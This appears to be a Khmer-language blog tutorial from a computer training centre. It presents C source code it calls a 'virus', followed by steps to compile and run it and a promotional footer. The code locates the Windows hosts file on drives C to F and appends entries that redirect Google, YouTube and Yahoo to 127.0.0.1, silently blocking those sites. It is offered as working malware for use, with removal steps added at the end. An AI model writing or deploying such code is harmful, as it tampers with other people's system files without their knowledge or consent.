សរសេរមេរោគបិទវ៉ិបសាយ

បង្កើតមេរោគបិទវ៉ិបសាយ Virus Block Websites

aការសរសេរដោយប្រើកម្មវិធី C ដើម្បីសរសេរ និង compile ជាមេរោគ
ខាងក្រោមនេះប្រភពកូដ source code សរសេរក្នុង ​​កម្មវិធីC

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

ធ្វើយ៉ាងណាដើម្បី Compile ?

1. ដោនឡូត Download ប្រភពកូដ source code មេរោគ ចុចលើនេះ.
2. ចំលងបញ្ចូល Compile source code ដោយប្រើ C/C++ compiler។
3. សាកល្បង រត់ compiled module វានឹងបិទវ៉ិបសាយ
4. ម្យ៉ាងទៀតលោកអ្នករត់ file block_Site.exe, ពេលនោះ restart កម្មវិធី browser ហើយបានបិទ URL បង្ហាញលេចចេញ “Page cannot displayed“។
4. ដោះចេញ remove បង្ហាញដូចខាងក្រោម
%windir%\system32\drivers\etc

5. បើកឈ្មោះ file named “hosts” ដោយប្រើ notepad ចុចបើក អ្នកនឹងឃើញ 127.0.0.1  google.com

6. លប់វាចេញ។

———————————————————————————

មជ្ឈមណ្ឌល អាយធី ខេប៊ូ-IT CAMBO សរសេរកម្មវិធី:
– រចនាវ៉ិបសាយ & Hosting គ្រប់គ្រងក្រុមហ៊ុន…
– បង្កើតកម្មវិធីគ្រប់គ្រងទិន្នន័យ
– ដំឡើងប្រព័ន្ធ ណែតវឺក Networkingកម្មវិធីសិក្សាបើកវគ្គខ្លី(សិស្សចាប់ពី ១០ឡើងទៅ)
–  វគ្គរចនាវ៉ិបសាយ HTML,CSS, Javascript, PHP, ASP.NET
–  វគ្គដំឡើងកុំព្យូទ័រណែតវឺក Networking
–   វគ្គជួសជុលកុំព្យូទ័រ Computer Repairing
–   វគ្គសរសេរកម្មវិធីលើ iOS (កម្មវិធី iPhone, iPAD)

ទំនាក់ទំ​នង លោក ទាវ​ ឈុន ណន: 0977778647-077778647-070778647
Email: chhunnan@gmail.com
Chat: yahoo, skype: chhunnan
www.itcambo.com

ITCAMBO-NEW